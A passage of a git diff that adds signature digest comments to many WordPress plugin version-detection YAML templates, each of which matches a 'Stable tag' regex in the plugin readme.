490a0046304402205d16acb9b8205d069e334f846be52c5ef8ac4f50017bb9bbbb31939916fb12c30220093a3c0765dc56fde27176087881bf29756539b424b98c81c0ab6b36a7d4dcd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..b6ac546f8e 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e2c7ef226a73f6469b73c591535bcfa7a27c6847730af89b6cd285642439bd8002205a36e360df6a4051283198bdbf690037f5afbd5f64cf0d715dc930932fe2cebb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..097480af77 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb8ed733cc1555ad4fd5cc974145988db3e170040d0946a21125334292b47bea022100a35d9c960ee3524cc6bfcd6c1ab61cd8fb908faa0de1165f502c6c4c00a482b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..09d89aab88 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202fce55fd16eac8c13329be4ba8f4dca199b61b8a638f62f3881105713e608766022100be6c0ebe6d6420727d0c68a9973939fee3d6361f5cc0e48f080b9c8299b55f8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..809930b93c 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a6139cf6ee37bb7b7c273d32d8a034292e08e9838bf9825bb4ee47fbb127293022100ee1628b3da4045c48c176d7a3a5c8d8ec5f72399fa35b173d7aa3da435ed0d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..c93104e9cf 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204567ba9b950eb781161136152674085b76b2b8be2fb3ef05374842bb968a7e060220372d0e8ce190cbffe3ad7737954fb246bc797540b258895a87c5ce49f6bed5a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..4e21480374 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203fb0f945eb1ec01b8d7862cd18b83923f4110144fc8f632e97544fd1a2e30464022100fb75adba21c5ec1dc03bb557e534f5ee4fbc4a51dbf13a1683b4e918022525ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..2d0fa4fa30 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbad762a7ec34c159695614623589870c1d5d7a8c6b03d8d6d6e78d07d12e481022046deb2a3e02934d2aea12a09e7da78dc3fd2aaac18ca10af4c4a7159565d9c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..806001a392 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a210c6481c1e6f80fb05a8e4d7e4c48f0294e973300ed77c1167064e7b78f1b022100cc4c7d6c376ec3eea784a02b25d172e155d663375dbdc10ce72559a70aeed92f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..1bfbd6e088 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df27de98d34cce19c63620fa41ff328b13bbf8432fbdf88ab075ce38c93b6d70022100e919db6486d0c389c84e656ca4a4396d3ed686b1a97ef6dad5351f52d63a0987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..6d714ea8cc 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220774127210a3fb9f7971b835962a46f6a24e6b0eb0d427cfa3d57bfee99b3a83002201db1803f2d684f2079673b8b93b8e0890cdc8f2835dc989c680f32db9bce931b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..ed7a23daa0 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f4ba7c439ff181b93ab15ac0deca01ea5009ae34d45d59fbe2de5bf68ff65350220686dfb8ac979356261a7373f34f6b559a4e9bebf461ae461611fbe0925652720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..64017121a4 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0ba579349aa01c5b7fb42c4f57eaa390d4cccdbfa98819f49d2032126123c24022100c5e7cf91c1687b63f67bf045f1cf21f19e86be6562280d69e6f08cd612e0cd71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..614cfe07a1 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b792f5552cfe9a44b81f08e36944442f33c13425ce16e45b10c314b001653715022033a78671374ecb7949a38604d97c6b27b60d1c1d88574ec46c2aa05f8deaaac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..e5274b3dc1 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e4a1946f923a5eb98832c10e250c7fa86035997e28fb92fb816f65e3ba0b9aa0220016d10aa10b1dbe09041b4d04e7adf8e1249994f70803683f82fd3cc431ce9c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..c4db53c298 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088731e5eccce6db5bea326f9571f9f3bb4f5fae56b30fb78903d47ad4e23a091022100840fb10b0325af0359f448aed9d00f79ed766e1ca94106c473cb77786d304eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..a68ca67cde 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203eae430fb0b4240bed01e86436376818527622c6a2e2c6255208df0bc7de8242022056a2b1c288eea2581854cad0845d0216fc5914f5c14379251e0a088c1aa0c6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..75d321c180 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b542868b00c4b10fe4c1b2cee83f79fc20a3cbc45d6a17aeabb6e368c1c9d3702205bfc78e50f31bd16e19451f4324a018403d3ad823e2007b0bb7e95c004f92065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..27403aa2e1 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d7efccfcfc0ed22f4a773b0c7b409a8776a06bfc4d74cef1b36ca7c406d87370220774f6043791510cae45881afb28fd0e7afb0a611cc72760166f732f0ce1bbd0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..68e24e4a1b 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022075ad10bc7ecd5be965e636a0f86386de178a3aed843fbd2de6ba7d503090f5ce02205bba22b4801ef6859288b938f675dc6977b98ce537b6fd1ffe481f7ddf494de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..04796d5c23 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019c26668847a112b6bb06bb6a6ed560c2b263617e0bb827ed2b77f704b776c25022017348dc027cd011b9c48545573636544ff69ef733e199fe37396b07ccc7ffe61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..c577683710 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a00453043021f1c473ba317a8528870f28e10078cc4ae5de11d92e6a87a77f7538f4e77542302206995e4f0cb78bf08407d2859b2e21e8dde259f037cbea5d5f6669ec260088f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..5723fbb04a 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b07b111a0e63fed66aaf34879aa006a99f066c721519bb426dfaf7b47a4442e202204f06761f49523eec3ce45e3a0da1c013e7f410a2aef7198eccb9888239b08a61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..1dd287127c 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220412d100cb4636fe11f042b187e400ba214540c3ee038da1f7707367eb5362e9202205baa029d16fc55602edb10cdc2c8d55d40d16e82f2acdd31180d0f0930424f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..cc8a5f5de6 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c346670033bbcf1bdb99026c0941fe15029bfa359e33e7937228e32d79b5de9502205e2dfd9544e790e78dbdd303ab711902336ce13712e3a4564c06302ceac23cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..db6938c944 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4dcb1a07aae4840b50bb86f7e55ac9269205b805324f7efd3ebd81e18aabaf0022100b43fedfd40abe151ef805cba2471c705e22681db3c7bf26c5ac8050e6487cd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..4cc88fd84b 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b57ae89b9b3dc1b58cffc5c0a96bfa3f08904c7a5edfab56c63c1554d7bf9dfc022100bc457b3a3b67be15f49a06687c489bc7b8d5aab49c0de79c7406c32d57e5a69b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..3619dec4ff 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100921a500c362a4623b327b46df1a8cd31cfe6fe988580d39751b4b4fef135223e022100898ce4bb184c0a05cc830da6a92500712d89040cea75a5d5fc9d8a2d1638390c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..fdb70d6803 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099fcf6fd3e520638a4ce07496d7d086d512c3d9faa862decf1a927e9f33231cd0220769ac062d5b1b71bbd4ff9153249880dac3d2a9a6b132e358b8d106b1f871743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..12022e2bf5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100829beb4af576fe6a86f0738e91938f3358479253f2f871b9f3b4fd28492587e502202f1d17bc7836e50c79f2324dea23312e33689be555cc1743672372988ae74800:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..b67ea8b10a 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bc5e0f5e84b99ee04da58f574074ed01f8893517df9525df8308ca9f604344e7022029221caf57f159ff9b90ffad4fdefc0ae9deb585311fc69e8e8f38c7b5e5a741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..176de0373d 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022064433d618ad52fa24c8b493c19cd20640827390bed64ef4df04da6923f138bfa022100d963dd0c063717da0deb50a9d9d0f043cc64baf541efdcb18ba291d665c74581:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..f2cbae3670 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee71412835b93d984a46db2e3509fc737f53cfbcc3e19e653a4e764b1f8a04ad0220062a7ed47fc47c46024f08c893cfe69c57c8b19d32b2ad2518b60e908d490317:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..33451699a2 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100faae5094049499711c9933afaf7fac5dcf6c0d00de47a6a754c6fcc0e232c3dc022057e9371559d5909710fd659192bf0e05b7f2d137a8966bf8d0cf40f172f28156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..520c49e760 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4c43d5e8eb18338dfb3a5bad1d63c878513332fc7c4d127eb3e363ff493e1440221008918bb5aadc350199efef33c60e9bcca14cb225a91e06abc6f23deafa00158df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..290ab71df8 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205c2bb358be1596fcdc0150198852a4875240d67b28ac200e69e06214933b4ac20221009b4da49b7ebf1bf868b97b91d1226381f42272a6e595d4eb43e78b502770a9d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..6e683b87e6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203eb046d4bac122edc23125477764212856a12e4aec68e1fbc77e320443fc9b62022100d8e8fb9fdb3a09d9b6d4075fb2a114e2d42a5dffcc665d843eeace90d871a71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..b7a045951b 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022022a93718a53f3a3ac396f55c641669dcbe41c45c7d6c40097ca0b408548298bb022100c5e51d9d1f22d8e2421bc7a47f29522168bda819acbfa6d35478cd81a40bf0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..d0fa559e88 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001b20f49339cf9fe22cd4e1baead218d4276af9a3e00f2a3f2299e71a2c1b325022100b682fdc1b697852eba154b14866fb6b1fa63d112deb123f7fb7850ab42879703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..b182306f7e 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e56c1c05f6db1ed0418ef4287d109fef3cba879a50cca7646010950a70321da002210090b822ecd871b244a85010331dfd3e4c375e513ab5d04d220f1d561f80d0ad1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..c76755d890 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205a5ae429c3e6511264f13ebbedaf964e6e8b859aa8f6ecca9006735670ecd84c022100ce4f7438e7e09266ba15e558aab48862f75f9b5dcdc58de50fedd13dfa074a71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..eed33ee2ce 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204399661e9d91b64a617427e86035f551aff78bf021a2c52bea0ddc7ee2b286f60220120b29ba16721c7953354e86a6f78e6b1d7f25085bdcc33808e141276556ae5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..d7425aad98 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a919f726d4e9ce9842a4bab9b1e8731837b4c038ded72a6e783ddf25a55366bd02203122e75642aa4487174fd79ea96adb52614860ef165492a4294be552354d21fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..e79d3e6a43 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a00453043022011be58b5608ed8306d377c6961b5d174f1cb03c517378c609863e28f1c9e3f91021f261fdfe1e6a3f2f75e009effcf8427f32c202fcbcead42d2bd15f4dccf8946:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..ad77bc8f6c 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206159cffed4970cc64e93458ec1699bff0c526301819c630ceda57c760f1892d0022100c3fc2af6d9f4ff30a6b34ebb0aef91947b94a404a3b5d6fa02aeaf07b25d7998:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..4da73daab3 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202172e34fccb39b0ee440f5c2653b6d399f1fff42ac46193b61d0968c7bf2b069022100c3bf075bf6eeb69497a8a6695f93a4794e4514a575faa79ec9466250894e90cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..f95467ab6a 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d5d44f4ff4b74ed95cf3c54fc30d1e1c6f84d55875dfd7fb28d413caa242033022100d3b8faa2380ed76ec33062b59a6c9413281af526d286e9befe71af23102f8874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..3fc4e2caf2 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 